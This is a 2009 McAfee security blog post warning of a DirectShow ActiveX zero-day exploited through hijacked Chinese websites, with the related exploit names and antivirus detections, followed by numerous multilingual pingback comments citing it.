New Attacks Against Internet Explorer
Monday July 6, 2009 at 2:39 am CST
Posted by Haowei Ren, Geok Meng Ong
If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.
At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.
When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.
During research, one of the things we found interesting was the web exploit toolkit explicitly checks that the origin of the hyperlinked references do not come from the “.gov.cn” and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references are not coming from any of these domains, it starts sending a cocktail of exploits including:
- Exploit-MSDirectShow.b (zero-day)
- Exploit-XMLhttp.d
- Exploit-RealPlay.a
- JS/Exploit-BBar
- Exploit-MS06-014
Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.
From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.
When successful, the attacker installs a downloader Trojan that could download other malware.
This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, on IE 7, the browser on Windows Vista systems, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.
The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).
We will post more information as we receive it.
(Thanks to our colleague Wei Wang for assistance in this analysis.)
July 6th, 2009 at 02:58
[...] http://www.avertlabs.com/research/blog/index.php/2009/07/06/new-attacks-against-internet-explorer/ [...]
July 6th, 2009 at 06:32
Sicherheitswarnung! Weitere Sicherheitslücke in DirectX (DirectShow / msvidctl.dll) ermöglicht das Ausführen beliebigen Schadcodes…
Erneut ist eine weitere Sicherheitslücke in einer DirectX/DirectShow-Kompontente aufgetaucht:
Dieses Mal handelt es sich um die msvidctl.dll und im spieziellen um das zugehörige ActiveX-Control “BDA Tuning Model MPEG2 Tune Request” mit der CLSID {…
July 6th, 2009 at 07:41
[...] 0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks http://isc.sans.org/diary.html?storyid=6733http://www.avertlabs.com/research/blog/index.php/2009/07/06/new-attacks-against-internet-explorer/http://www.f-secure.com/weblog/archives/00001716.htmlhttp://sunbeltblog.blogspot.com/2009/07/microsoft-directshow-zero-day.html [...]
July 6th, 2009 at 08:05
[...] unter Windows XP. Laut McAfee nutzen manipulierte Websites in China die Lcke aktiv aus.Finjan und McAfee warnen vor einer Zero-Day-Lcke in Microsoft DirectShow. Der Fehler besteht in einem ActiveX-Objekt [...]
July 6th, 2009 at 23:18
[...] [CSIS] (EN via Google) [6] IE 0day exploit domains (constantly updated) (2009-Jul-06) [SANS] [7] New Attacks Against Internet Explorer (2009-Jul-06) [...]
July 7th, 2009 at 00:47
[...] Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates [...]
July 7th, 2009 at 03:06
[...] In our blog from yesterday, we’ve described how Exploit-MSDirectShow.b has widely been deployed on [...]
July 7th, 2009 at 05:05
[...] an – ein ActiveX-Control-Element fr das Streaming von Videodateien. Die Sicherheitsexperten von McAfee haben nach eigenen Angaben vor allem Webseiten in China entdeckt, die einen Exploit fr die Lcke [...]
July 7th, 2009 at 10:17
[...] de sécurité McAfee a découvert une vulnérabilité importante dans Internet Explorer, qui aurait déj été [...]
July 7th, 2009 at 14:21
[...] di una nuova infezione, non è stato ancoro rilasciato nessun tipo di aggiornamento automatico da parte della Microsoft [...]
July 7th, 2009 at 15:15
[...] code has been hosted on a small number of websites in China, including schools and community clubs. McAfee comments: During research, one of the things we found interesting was the web exploit toolkit explicitly [...]
July 7th, 2009 at 15:29
[...] As a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of [...]
July 7th, 2009 at 20:27
[...] code has been hosted on a small number of websites in China, including schools and community clubs. McAfee comments: During research, one of the things we found interesting was the web exploit toolkit explicitly [...]
July 7th, 2009 at 22:42
[...] I prodotti Microsoft interessati da questa vulnerabilit sono Windows XP Home e Pro, Windows Server 2003 e Windows Storage Server 2003. A questo indirizzo Secunia offre un dettaglio del problema e un ulteriore approfondimento di McAfee è disponibile qui. [...]
July 8th, 2009 at 00:21
[...] McAfee Lab [...]
July 8th, 2009 at 09:07
[...] given the vulnerability the highest security rating. Haowei Ren and Geok Meng Ong said in their McAfee Avert Labs blog that the web exploit tool toolkit also sends a “cocktail of exploits,” including XMLhttp.d, [...]
July 8th, 2009 at 11:06
[...] McAfee, l’on se livre une analyse un peu plus poussée de l’exploitation elle-même. Le site de compromission –en fait le site visité par la victime- ne possède en tout et pour [...]
July 8th, 2009 at 23:27
[...] studi condotti è emerso un comportamento singolare da parte del codice malevolo. Infatti quest’ultimo controlla espressamente che la potenziale [...]
July 8th, 2009 at 23:48
[...] studi condotti è emerso un comportamento singolare da parte del codice malevolo. Infatti quest’ultimo controlla espressamente che la potenziale [...]
July 8th, 2009 at 23:51
IE: nuovi allarmi…
McAfee Avert Labs evidenzia preoccupazione per la disponibilità su molti siti cinesi di un exploit di una vulnerabilità zero-day (Microsoft DirectShow ActiveX). Da studi condotti è emerso un comportamento singolare da parte del codice malevolo. Infa…
July 9th, 2009 at 01:26
[...] code has been hosted on a small number of websites in China, including schools and community clubs. McAfee comments: During research, one of the things we found interesting was the web exploit toolkit explicitly [...]
July 13th, 2009 at 22:42
[...] our investigation, Exploit-CVE2009-1136, a new 0-day exploit was added into web exploit toolkits that widely released Exploit-MSDirectShow.b on hijacked websites in China just the previous [...]
December 12th, 2009 at 04:07
[...] [...]
December 12th, 2009 at 04:08
[...] a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of [...]